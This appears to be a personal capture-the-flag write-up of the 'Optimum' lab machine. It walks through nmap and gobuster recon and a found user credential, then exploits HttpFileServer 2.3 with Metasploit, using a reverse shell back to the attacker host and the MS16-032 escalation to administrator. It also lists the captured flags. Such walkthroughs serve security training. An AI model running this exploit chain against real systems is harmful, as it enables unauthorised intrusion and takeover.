Optimum
TARGET IP: 10.10.10.8
HOST IP: 10.10.16.10
Recon
NMAP
nmap [Target IP]

nmap [Target IP] -A -p 80

HTTP

Nothing on page source that I could find.
It is using HttpFileServer 2.3
Their latest version is 2.3m

The login button opens up prompt for login.

Let's take a crack at logging in with credentails
admin:admin
.

Discovered new directory
/~login
. This uses a tildy infront.
Vulnerable Software
HFS 2.3 is old and filled with goodies.
Lots of vulnerabilities are mentioned on their own website:
Enumeration
Gobuster
gobuster dir -u http://[Target IP] -w /usr/share/dirb/wordlists/common.txt

Try putting a ~ at the end since we saw that the
/~login
directory had it.
gobuster dir -u http://[Target IP]/~ -w /usr/share/dirb/wordlists/common.txt
WinPEASx64
Credentials for kostas
kdeEjDowkS*
I need to be better at looking through these to see if I could've found more information.
Browsing
Run the typical commands from the hacktricks checklist to see some information on the system.
sysinfo
This will tell us the system is Windows 12 Server R2.
This is a 64-bit system.
Exploit
Metasploit
Let's check out Metasploit
msfconsole
search hfs
use 1
show options
set rhosts [Target IP]
set lhost [Host IP]
check
exploit
Now we have a Meterpreter session.
shell
whoami
type C:\Users\kostas\Desktop\user.txt
User Flag
b9058357319a5b76f10e01253a382c67
Next step is to use Metasploit to gain root privileges. I tried browsing the system for a while but didn't find anything useful. The tool I need is a kernel exploit.
When we ran the
sysinfo
command we found the system is a Windows 2012 R2 server which is a 64-bit architecture. Thereverse_tcp_shell
that we are using as our payload is a 32-bit process. We shouldmigrate
over to a different process that is 64-bit.On the meterpreter shell run the following.
ps
We see that the
explorer.exe
process is running onPID 660
.Let's
migrate
over to this process.
migrate [PID for explorer.exe]
Next, let's
background
the current meterpreter system we have in the system.
bg
We can confirm this has been backgrounded:
sessions
Since we now have access to the windows system, let's see if we can find another metasploit local exploit to root privileges.
search exploit/windows/local
I had to get a hint here and use a Microsoft vulnerability in the system MS16_032.
use 33
I'm not sure if winPEASx64 showed this somewhere but I could have also used a tool called window-exploit-suggester. Here is a write-up on how to use it. It's a bit complicated as you run it on your host system by exporting the target system info.
After selecting our exploit in Metasploit we will then set it up and run it.
show options
set session 1
set lhost [Host IP]
exploit
We now have a shell to the system as administrator.
shell
type C:\Users\Administrator\Desktop\root.txt
64869e78042316656ffc989ba52d5d2b
Conclusion
I knew going into this lab that I could use Metasploit. I didn't know when I would get to use it but knew it was an option. I wanted to try to get access to the system without Metasploit but I don't think my level of skill is high enough to do it, let alone understand it.
I need to work on my enumeration skills with Windows systems. I have a far better understanding of them with Linux and could probably spend some more time with Windows.
It was a good lab but I'd really like to finish one of these without help one day.
Last updated